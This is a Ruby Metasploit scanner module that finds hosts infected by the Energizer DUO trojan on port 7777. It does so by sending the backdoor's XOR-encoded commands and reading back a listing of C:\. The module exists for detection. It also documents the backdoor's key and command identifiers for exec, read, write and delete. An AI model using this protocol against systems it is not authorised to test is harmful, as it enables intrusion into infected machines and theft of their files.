##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'English'
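class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Tcp
  include Msf::Auxiliary::Scanner
  include Msf::Auxiliary::Report

  # Every byte exchanged with the backdoor is XORed with this key; the same
  # operation both encodes and decodes.
  XOR_KEY = 0xE5

  # Command identifiers understood by the backdoor, keyed by a short name.
  COMMAND_IDS = {
    exec: '{8AF1C164-EBD6-4b2b-BC1F-64674E98A710}',
    dir: '{0174D2FC-7CB6-4a22-87C7-7BB72A32F19F}',
    write: '{98D958FC-D0A2-4f1c-B841-232AB357E7C8}',
    read: '{F6C43E1A-1551-4000-A483-C361969AEC41}',
    nop: '{783EACBF-EF8B-498e-A059-F0B5BD12641E}',
    find: '{EA7A2EB7-1E49-4d5f-B4D8-D6645B7440E3}',
    yes: '{E2AC5089-3820-43fe-8A4D-A7028FAD8C28}',
    runonce: '{384EBE2C-F9EA-4f6b-94EF-C9D2DA58FD13}',
    delete: '{4F4F0D88-E715-4b1f-B311-61E530C2C8FC}'
  }.freeze

  # Upper bound on how much directory-listing data is read back. The
  # 32-bit length prefix comes from the remote end and is therefore never
  # used directly as a read size (a hostile or broken listener could
  # otherwise request a multi-gigabyte read buffer).
  MAX_LISTING_BYTES = 1024 * 1024

  def initialize
    super(
      'Name' => 'Energizer DUO Trojan Scanner',
      'Description' => 'Detect instances of the Energizer DUO trojan horse software on port 7777.',
      'Author' => 'hdm',
      'References' => [
        ['CVE', '2010-0103'],
        ['OSVDB', '62782'],
        ['US-CERT-VU', '154421']
      ],
      'License' => MSF_LICENSE,
      'Notes' => {
        'Stability' => [CRASH_SAFE],
        'SideEffects' => [],
        'Reliability' => []
      }
    )

    register_options(
      [
        Opt::RPORT(7777),
      ]
    )
  end

  # XOR-"encrypts" (or decrypts) a byte string with the backdoor's key.
  #
  # @param str [String] raw bytes
  # @return [String] the transformed bytes, same length as the input
  def trojan_encode(str)
    str.unpack('C*').map { |c| c ^ XOR_KEY }.pack('C*')
  end

  # Builds an encoded command frame for the backdoor.
  #
  # @param cmd [Symbol] one of the keys of COMMAND_IDS
  # @return [String] encoded frame: 4-byte little-endian length, GUID, NUL
  # @raise [ArgumentError] when cmd is not a known command (the original
  #   silently sent a frame with an empty GUID)
  def trojan_command(cmd)
    cid = COMMAND_IDS.fetch(cmd) do
      raise ArgumentError, "unknown trojan command: #{cmd.inspect}"
    end

    # 0x27 (39) is the length of the braced GUID (38 bytes) plus its NUL.
    trojan_encode([0x27].pack('V') + cid + "\x00")
  end

  # Probes a single host: requests a listing of C:\ and, if the reply
  # decodes to a listing, reports the host as infected.
  #
  # @param ip [String] target address
  # @return [void]
  def run_host(ip)
    connect

    sock.put(trojan_command(:dir))
    sock.put(trojan_encode([4].pack('V') + "C:\\\x00\x00"))

    # The reply starts with a 4-byte little-endian length; a short or
    # missing read leaves len nil rather than feeding nil into get_once.
    lbuff = sock.get_once(4, 5)
    len = lbuff && trojan_encode(lbuff).unpack('V').first
    if len.nil?
      print_error("#{ip}:#{rport} UNKNOWN: No response to the directory listing request")
      return
    end

    dbuff = sock.get_once([len, MAX_LISTING_BYTES].min, 30)
    if dbuff.nil?
      print_error("#{ip}:#{rport} UNKNOWN: No directory listing data received")
      return
    end

    files = parse_listing(trojan_encode(dbuff))

    # Required to prevent the server from spinning a loop
    sock.put(trojan_command(:nop))

    print_good("#{ip}:#{rport} FOUND: #{files.inspect}")
    # Add Vulnerability and Report
    report_vuln({
      host: ip,
      name: 'Energizer DUO USB Battery Charger Software Arucer.dll Trojaned Distribution',
      refs: references
    })
    report_note(
      host: ip,
      proto: 'tcp',
      port: datastore['RPORT'],
      sname: 'energizer_duo',
      type: 'Energizer DUO Trojan',
      data: { energizer_duo_trojan: files.inspect }
    )
  rescue ::Interrupt
    raise $ERROR_INFO
  rescue ::Rex::ConnectionError, ::IOError => e
    vprint_error(e.message)
  ensure
    # Close the socket on every exit path, not only the success path.
    disconnect if sock
  end

  private

  # Splits a decoded listing into [type, name] pairs. Entries prefixed with
  # '?1' are reported as directories ('D'); everything else as files ('F').
  #
  # @param data [String] decoded, '|'-separated listing
  # @return [Array<Array(String, String)>]
  def parse_listing(data)
    data.split('|').map do |entry|
      if entry.start_with?('?1')
        ['D', entry[2..-1]]
      else
        ['F', entry]
      end
    end
  end
end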